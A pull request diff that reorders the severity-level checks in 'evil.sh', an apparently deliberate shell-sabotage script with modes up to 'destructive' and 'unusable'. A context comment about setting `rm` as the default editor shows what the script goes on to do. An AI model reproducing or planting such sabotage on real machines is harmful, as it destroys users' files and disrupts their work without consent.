### PR TITLE
behaviour fix for categories

### DIFF
--- a/evil.sh
+++ b/evil.sh
@@ -15,27 +15,27 @@ EVIL_BEHAVIOUR=annoying
 
 function insane()
 {
-	test "$EVIL_BEHAVIOUR" = "insane"
+	annoying || test "$EVIL_BEHAVIOUR" = "insane"
 }
 
 function annoying()
 {
-	insane || test "$EVIL_BEHAVIOUR" = "annoying"
+	destructive || test "$EVIL_BEHAVIOUR" = "annoying"
 }
 
 function destructive()
 {
-	annoying || test "$EVIL_BEHAVIOUR" = "destructive"
+	devasting || test "$EVIL_BEHAVIOUR" = "destructive"
 }
 
 function devasting()
 {
-	destructive || test "$EVIL_BEHAVIOUR" = "devasting"
+	unusable || test "$EVIL_BEHAVIOUR" = "devasting"
 }
 
 function unusable()
 {
-	devasting || test "$EVIL_BEHAVIOUR" = "unusable"
+	test "$EVIL_BEHAVIOUR" = "unusable"
 }
 
 # Set `rm` as the default editor.


### PR DESCRIPTION
The categories were hierarchical in wrong direction.
Less destructive modes enabled only the more destructive ones.
This is now inverted.

fix #66
